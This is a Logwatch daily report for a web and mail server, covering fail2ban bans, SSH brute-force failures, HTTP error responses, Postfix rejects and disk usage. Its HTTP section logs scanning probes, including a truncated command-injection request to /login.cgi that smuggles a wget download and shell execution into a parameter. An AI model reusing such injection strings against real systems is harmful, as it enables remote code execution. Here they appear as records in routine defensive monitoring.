################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Wed Aug 7 04:42:10 2019
Date Range Processed: yesterday
( 2019-Aug-06 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [235:238]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
123.163.114.57 -> zapf.wiki:443: 1 Time(s)
60.191.52.254 -> zapf.wiki:443: 1 Time(s)
A total of 3 sites probed the server
5.188.210.101
66.240.192.138
91.185.211.27
Requests with error response codes
400 Bad Request
null: 11 Time(s)
zapf.wiki:443: 2 Time(s)
/: 1 Time(s)
/a2billing/admin/Public/PP_error.php?c=accessdenied: 1 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://54 ... h%20/tmp/kh%27$: 1 Time(s)
/recordings/: 1 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 1 Time(s)
http://5.188.210.101/echo.php: 1 Time(s)
mstshash=Administr: 1 Time(s)
404 Not Found
/robots.txt: 29 Time(s)
/berlin/apple-touch-icon.png: 12 Time(s)
/wp-login.php: 3 Time(s)
/reader/2016_SoSe_Konstanz_lang.pdf%7CLangversion: 1 Time(s)
/reader/2016_sose_konstanz_lang.pdf: 1 Time(s)
/reader/2017_SoSe_Berlin_vorlaeufig.pdf%7C: 1 Time(s)
/resolutionen/sose12/Reso_Interdisziplinae ... f;Stellungnahme: 1 Time(s)
/resolutionen/sose14/reso_sose14_zusammenarbeitzapf-che.pdf: 1 Time(s)
/sites/default/files/2012_WiSe_Karlsruhe.pdf: 1 Time(s)
/sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s)
500 Internal Server Error
/: 96 Time(s)
/robots.txt: 40 Time(s)
//recordings/misc/play_page.php: 1 Time(s)
/a2billing/admin/Public/PP_error.php?c=accessdenied: 1 Time(s)
/recordings/: 1 Time(s)
/secure/ContactAdministrators!default.jspa: 1 Time(s)
502 Bad Gateway
/berlin/newsletter/newsletter-subscribe: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
Invalid Users:
Unknown Account: 1894 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
300 Miscellaneous warnings
18.451K Bytes accepted 18,894
18.451K Bytes sent via SMTP 18,894
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
289 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
289 Total 4xx Rejects 100.00%
======== ==================================================
524 Connections
298 Connections lost (inbound)
524 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Timeouts (inbound)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
invalid : 1 Time(s)
root : 4 Time(s)
Failed logins from:
Illegal users from:
undef: 1393 times
**Unmatched Entries**
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (user,ssh-connection) [preauth] : 1 time(s)
fatal: no matching cipher found: client aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,twofish-cbc,arcfour server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 2 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/vzfs 400G 242G 159G 61% /
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################